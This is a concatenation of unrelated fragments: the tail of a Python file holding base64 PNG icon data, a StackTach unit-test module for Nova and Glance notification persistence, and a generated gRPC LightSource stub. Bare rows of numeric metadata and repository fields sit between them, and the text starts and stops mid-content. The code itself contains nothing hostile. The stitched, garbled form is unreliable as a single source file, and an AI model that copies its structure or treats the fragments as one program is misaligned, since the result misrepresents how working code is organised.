9dF338cDAwGZTmULdYndYxTv0fbRH4EFYDx3qeTiuDimpIDZ44d7i8xp+oJ0iRk32/zlkl0dmksttRQ+NLjl0wxzwMybTg+OXqYE6Vins6X/QlCLyl4TzvJVN79BOoEyHuBPHoW7epj9ZT88Y7Pj8dIJiKBZNro5Q6B9OlJ1IG1ZlsAAAAABJRU5ErkJggg=='
minimizeicon = b'iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAAHeTXxYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAGhSURBVDhP5ZVLSsRAEIZ7xH02QsAD9E7P4RXmNDNewW0O4A08QBbuFTcJZDOgISiYBHSr9XdX13Q6DzJxEMQPkq5KVXWqu/qh5lEUxd0XweoUzi3LsqcT/0OHFV5DlhVhhNCI/tBKZJ7nj5CB1vpSIgehAI0onw8Chg37CDCa3IcQA7wAq+oUr7quX11mlPID2lEkX+pFU7O22jA0vGsWTcDG/NwGDtK27TscIHdGQz3lLPYoy/KZxW7QXHpBSZJcYSb8h019Pgkzqgl2u90Fux+OP+W9ugfcdiZqTmrMviTQUAdWe8AZPoTJRmbPr0NIWL/j1GkOxwniAQs4XdgkmM3k4293kKbpDYuCnA1owwBHHMfnURSdkbiVPYU1ZXKZwBwXfw8M7YC1OwqGH269cDdtraZU0zRvVVW9sDoLrzCOfYEc+JFJh6CTxFwJS0AsdwPkKFi0wpfwD39E84zDDvWbekYvtB4cYPAXA239e/48CnzYfXQxCPhobfY4p2Z+lgxi3JXMDP5IY6NZ+8/hviRZ2bAONq6ttpjuVfl7KPUNiaiVDPThZ8EAAAAASUVORK5CYII='
refresh = b'iVBORw0KGgoAAAANSUhEUgAAABwAAAAcCAYAAAEFCu8CAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAJqSURBVDhP7ZVPSFRRFIfnSc1GUBehi5BMosKFLVoW6EIoUwYRBNfhokDduZAW6rJNq1q4ELdtWxgxEKSGiAvbCFEq0yLCP422SRB1pu8377znm5nnmzFdDOgPPs65Z867b+65574bO4Oy2WzC3ICINpudzAXyRHTQXFcE7sAf+AZVFi4hMqeh14Yar5lbhshOwj68gGkL535Imyu/HbI2PKV4sEY2tx4GGdmAHph1RcINGIWrFjonMWMvbMNtiEMV1MEb2AB/hY5ZPdSBSTmOs+5GjsVvY+bG+H3C3DOKWbWfnsYt7IuYA1uyGhe2yU2Yh6ckDEAnTMIOsSf8zXr4z52sDLEW7ds4rMIB/Ib30AzXYMBSi4qzCXG4b/Y6jMAy9EF+L0rMNgddNvRFrAly5wL5B8frcu3NEqWe0bhATdAG2tt3ClS4WI4qbqNAVbVyTxYq1CsYct2A7JkU+EfNE7Eu2ITC7fMfVFPvwBQ8BjX6GixYmq+w2a9gOqEVdiHJNp3ik1lpKlpimFi2PqfqvBZoBH2Uj0Al+AUr8JNSHGIjVbwrAfGiBCziboHa/xHswRf4Cqq/rqs50GdsHrTjOk/S8SV0kkhSQ3aDJvgO2tCSIk/fzj74ARmQol9Igh4aBr1MDV2WyB2DMJW1QlEDkeW+1EkKO/k9mHvuKE+ztP0n8yPFHLcwz+ADfIy8S0kO3uSvQdeF0DksKfJ0lNIwC7rYo0WS98LnsAG7oBe3QB3EQd2s4yO/Fu7CS9Atqg5P2HRFCiuprlrdmrpF06CV9cNDUKkaoBpUpr+wDSn4DG9hnRJmsBdSsdg/hcMop1Uszc4AAAAASUVORK5CYII='
| 953
| 1,158
| 0.96887
| 77
| 2,859
| 35.974026
| 0.974026
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146615
| 0.002798
| 2,859
| 3
| 1,159
| 953
| 0.824974
| 0
| 0
| 0
| 0
| 1
| 0.983217
| 0.983217
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
037fa9ffe173e66b19b1f49528313e0505b49367
| 28,406
|
py
|
Python
|
tests/unit/test_notification.py
|
PreetiKamble29/stacktach
|
f4f905393a0d7eaa226a72b6a27b61e4ef52211d
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_notification.py
|
PreetiKamble29/stacktach
|
f4f905393a0d7eaa226a72b6a27b61e4ef52211d
|
[
"Apache-2.0"
] | 4
|
2020-02-28T10:27:34.000Z
|
2022-02-02T01:13:09.000Z
|
tests/unit/test_notification.py
|
PreetiKamble29/stacktach
|
f4f905393a0d7eaa226a72b6a27b61e4ef52211d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import mox
from stacktach import notification, stacklog
from stacktach import utils
from stacktach.notification import Notification
from stacktach.notification import NovaNotification
from stacktach.notification import GlanceNotification
from stacktach import db
from stacktach import image_type
from tests.unit import StacktachBaseTestCase
from tests.unit.utils import BANDWIDTH_PUBLIC_OUTBOUND
from tests.unit.utils import REQUEST_ID_1
from tests.unit.utils import DECIMAL_DUMMY_TIME
from tests.unit.utils import DUMMY_TIME
from tests.unit.utils import TIMESTAMP_1
from tests.unit.utils import TENANT_ID_1
from tests.unit.utils import INSTANCE_ID_1
from tests.unit.utils import MESSAGE_ID_1
class NovaNotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_factory_should_return_nova_notification_for_nova_exchange(
self):
body = {}
deployment = "1"
json = "{}"
routing_key = "monitor.info"
self.mox.StubOutWithMock(notification, 'NovaNotification')
notification.NovaNotification(body, deployment, routing_key, json)
self.mox.ReplayAll()
notification.notification_factory(body, deployment, routing_key, json,
'nova')
self.mox.VerifyAll()
def test_factory_should_return_glance_notification_for_glance_exchange(
self):
body = {}
deployment = "1"
json = "{}"
routing_key = "monitor_glance.info"
self.mox.StubOutWithMock(notification, 'GlanceNotification')
notification.GlanceNotification(body, deployment, routing_key, json)
self.mox.ReplayAll()
notification.notification_factory(body, deployment, routing_key, json,
'glance')
self.mox.VerifyAll()
def test_factory_should_return_notification_for_unknown_exchange(
self):
body = {}
deployment = "1"
json = "{}"
routing_key = "unknown.info"
self.mox.StubOutWithMock(notification, 'Notification')
notification.Notification(body, deployment, routing_key, json)
self.mox.ReplayAll()
notification.notification_factory(body, deployment, routing_key, json,
'unknown_exchange')
self.mox.VerifyAll()
def test_save_should_persist_nova_rawdata_to_database(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task',
"bandwidth": {
"private": {"bw_in": 0, "bw_out": 264902},
"public": {"bw_in": 0, "bw_out": 1697240969}
}
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_nova_rawdata')
db.create_nova_rawdata(
deployment="1",
tenant=TENANT_ID_1,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix(TIMESTAMP_1),
publisher="compute.global.preprod-ord.ohthree.com",
event="compute.instance.exists",
service="compute",
host="global.preprod-ord.ohthree.com",
instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1,
image_type=image_type.get_numeric_code(body['payload']),
old_state='old_state',
old_task='old_task',
os_architecture='os_arch',
os_distro='os_distro',
os_version='os_version',
rax_options='rax_opt',
state='state',
task='task').AndReturn(raw)
self.mox.ReplayAll()
notification = NovaNotification(body, deployment, routing_key, json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
def test_bandwidth_public_out_is_read_from_json(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task',
"bandwidth": {
"private": {"bw_in": 0, "bw_out": 264902},
"public": {"bw_in": 0, "bw_out": BANDWIDTH_PUBLIC_OUTBOUND}
}
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
notification = NovaNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.bandwidth_public_out,
BANDWIDTH_PUBLIC_OUTBOUND)
def test_bandwidth_public_out_is_set_to_0_if_not_found_in_json(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task'
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
notification = NovaNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.bandwidth_public_out, 0)
def test_bandwidth_public_out_is_set_to_blank_object_if_none_in_json(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"bandwidth": None,
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task'
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
notification = NovaNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.bandwidth_public_out, 0)
class GlanceNotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_should_persist_glance_rawdata_to_database(self):
body = {
"event_type": "image.upload",
"timestamp": "2013-06-20 17:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"status": "saving",
"properties": {
"image_type": "snapshot",
"instance_uuid": INSTANCE_ID_1,
},
"owner": TENANT_ID_1,
"id": "2df2ccf6-bc1b-4853-aab0-25fda346b3bb",
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_glance_rawdata')
db.create_glance_rawdata(
deployment="1",
owner=TENANT_ID_1,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix("2013-06-20 17:31:57.939614"),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.upload",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=INSTANCE_ID_1,
request_id='',
image_type=0,
status="saving",
uuid="2df2ccf6-bc1b-4853-aab0-25fda346b3bb").AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
def test_save_should_persist_glance_rawdata_erro_payload_to_database(self):
body = {
"event_type": "image.upload",
"timestamp": "2013-06-20 17:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": "error_message"
}
deployment = "1"
routing_key = "glance_monitor.error"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_glance_rawdata')
db.create_glance_rawdata(
deployment="1",
owner=None,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix("2013-06-20 17:31:57.939614"),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.upload",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=None,
request_id='',
image_type=None,
status=None,
uuid=None).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
def test_save_usage_should_persist_image_usage(self):
raw = self.mox.CreateMockAnything()
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.upload",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"created_at": str(DUMMY_TIME),
"size": size,
"owner": TENANT_ID_1,
"id": "2df2ccf6-bc1b-4853-aab0-25fda346b3bb",
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_usage')
db.create_image_usage(
created_at=utils.str_time_to_unix(str(DUMMY_TIME)),
owner=TENANT_ID_1,
last_raw=raw,
size=size,
uuid=uuid).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_usage(raw)
self.mox.VerifyAll()
def test_save_delete_should_persist_image_delete(self):
raw = self.mox.CreateMockAnything()
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
deleted_at = "2013-06-20 14:31:57.939614"
body = {
"event_type": "image.delete",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"id": "2df2ccf6-bc1b-4853-aab0-25fda346b3bb",
"deleted_at": deleted_at
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_delete')
db.create_image_delete(
raw=raw,
uuid=uuid,
deleted_at=utils.str_time_to_unix(deleted_at)).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_delete(raw)
self.mox.VerifyAll()
class NotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_should_persist_generic_rawdata_to_database(self):
body = {
"event_type": "image.upload",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"message_id": MESSAGE_ID_1,
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"tenant": "5877054"
}
}
deployment = "1"
routing_key = "generic_monitor.info"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_generic_rawdata')
db.create_generic_rawdata(
deployment="1",
tenant=TENANT_ID_1,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix(TIMESTAMP_1),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.upload",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1,
message_id=MESSAGE_ID_1).AndReturn(raw)
self.mox.ReplayAll()
notification = Notification(body, deployment, routing_key, json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
class GlanceExistsNotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_glancerawdata(self):
raw = self.mox.CreateMockAnything()
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
created_at = "2013-05-20 19:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
},
{
"created_at": str(DUMMY_TIME),
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_glance_rawdata')
db.create_glance_rawdata(
deployment="1",
owner="testtenantid1",
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix("2013-06-20 18:31:57.939614"),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.exists",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=None,
request_id='',
image_type=0,
status=None,
uuid=None).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save()
self.mox.VerifyAll()
def test_save_image_exists_with_created_at_but_deleted_at_none(self):
raw = self.mox.CreateMockAnything()
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
created_at = "2013-05-20 19:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"message_id": "d14cfa51-6a0e-4cf8-9130-804738be96d2",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
},
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_exists')
self.mox.StubOutWithMock(db, 'get_image_usage')
for i in range(0, 2):
db.get_image_usage(uuid=uuid).AndReturn(None)
db.create_image_exists(
created_at=utils.str_time_to_unix(created_at),
owner=TENANT_ID_1,
raw=raw,
audit_period_beginning=utils.str_time_to_unix(audit_period_beginning),
audit_period_ending=utils.str_time_to_unix(audit_period_ending),
size=size,
uuid=uuid,
usage=None,
message_id="d14cfa51-6a0e-4cf8-9130-804738be96d2").AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
def test_save_image_exists_with_created_at_and_deleted_at(self):
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
created_at = "2013-05-20 19:31:57.939614"
deleted_at = "2013-05-20 21:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"message_id": "d14cfa51-6a0e-4cf8-9130-804738be96d2",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": deleted_at,
},
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": deleted_at,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_exists')
self.mox.StubOutWithMock(db, 'get_image_usage')
self.mox.StubOutWithMock(db, 'get_image_delete')
for i in range(0, 2):
db.get_image_usage(uuid=uuid).AndReturn(None)
db.get_image_delete(uuid=uuid).AndReturn(delete)
db.create_image_exists(
created_at=utils.str_time_to_unix(created_at),
owner=TENANT_ID_1,
raw=raw,
audit_period_beginning=utils.str_time_to_unix(audit_period_beginning),
audit_period_ending=utils.str_time_to_unix(audit_period_ending),
size=size,
uuid=uuid,
usage=None,
delete=delete,
deleted_at=utils.str_time_to_unix(deleted_at),
message_id="d14cfa51-6a0e-4cf8-9130-804738be96d2").AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
def test_save_image_exists_without_created_at(self):
raw = self.mox.CreateMockAnything()
raw.id = 1
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": None,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
},
{
"created_at": None,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(stacklog, 'warn')
stacklog.warn("Ignoring exists without created_at. GlanceRawData(1)")
stacklog.warn("Ignoring exists without created_at. GlanceRawData(1)")
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
def test_save_exists_should_log_warning_when_payload_is_invalid(self):
raw = self.mox.CreateMockAnything()
raw.id = 1
body = {
"event_type": "image.exists",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": []
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(stacklog, 'warn')
stacklog.warn("Received exists with invalid payload GlanceRawData(1)")
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
| 38.700272
| 86
| 0.547032
| 2,843
| 28,406
| 5.182202
| 0.086177
| 0.030883
| 0.020362
| 0.037467
| 0.853662
| 0.826105
| 0.804181
| 0.775742
| 0.754022
| 0.732845
| 0
| 0.053364
| 0.346899
| 28,406
| 733
| 87
| 38.75307
| 0.740783
| 0.026544
| 0
| 0.739663
| 0
| 0
| 0.226235
| 0.081708
| 0
| 0
| 0
| 0
| 0.01072
| 1
| 0.038285
| false
| 0
| 0.027565
| 0
| 0.071976
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03abf0a2fefc3cab75cf4c8fb666d8ef0115bd0b
| 4,736
|
py
|
Python
|
instrosetta/interfaces/light/light_source_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/light/light_source_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
instrosetta/interfaces/light/light_source_pb2_grpc.py
|
jmosbacher/instrosetta-python
|
b323ee4d3db0b7d8e22ec731dac521c967e5323d
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from instrosetta.interfaces.light import light_source_pb2 as instrosetta_dot_interfaces_dot_light_dot_light__source__pb2
class LightSourceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Initialize = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/Initialize',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeResponse.FromString,
)
self.Shutdown = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/Shutdown',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownResponse.FromString,
)
self.GetPower = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/GetPower',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerResponse.FromString,
)
self.SetPower = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/SetPower',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerResponse.FromString,
)
class LightSourceServicer(object):
# missing associated documentation comment in .proto file
pass
def Initialize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Shutdown(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetPower(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetPower(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LightSourceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Initialize': grpc.unary_unary_rpc_method_handler(
servicer.Initialize,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeResponse.SerializeToString,
),
'Shutdown': grpc.unary_unary_rpc_method_handler(
servicer.Shutdown,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownResponse.SerializeToString,
),
'GetPower': grpc.unary_unary_rpc_method_handler(
servicer.GetPower,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerResponse.SerializeToString,
),
'SetPower': grpc.unary_unary_rpc_method_handler(
servicer.SetPower,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'instrosetta.interfaces.light.light_source.v1.LightSource', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
| 48.326531
| 127
| 0.796875
| 513
| 4,736
| 6.888889
| 0.152047
| 0.076967
| 0.071307
| 0.129881
| 0.810696
| 0.810696
| 0.810696
| 0.753537
| 0.753537
| 0.739672
| 0
| 0.005636
| 0.138302
| 4,736
| 97
| 128
| 48.824742
| 0.860328
| 0.095228
| 0
| 0.30137
| 1
| 0
| 0.126761
| 0.075587
| 0
| 0
| 0
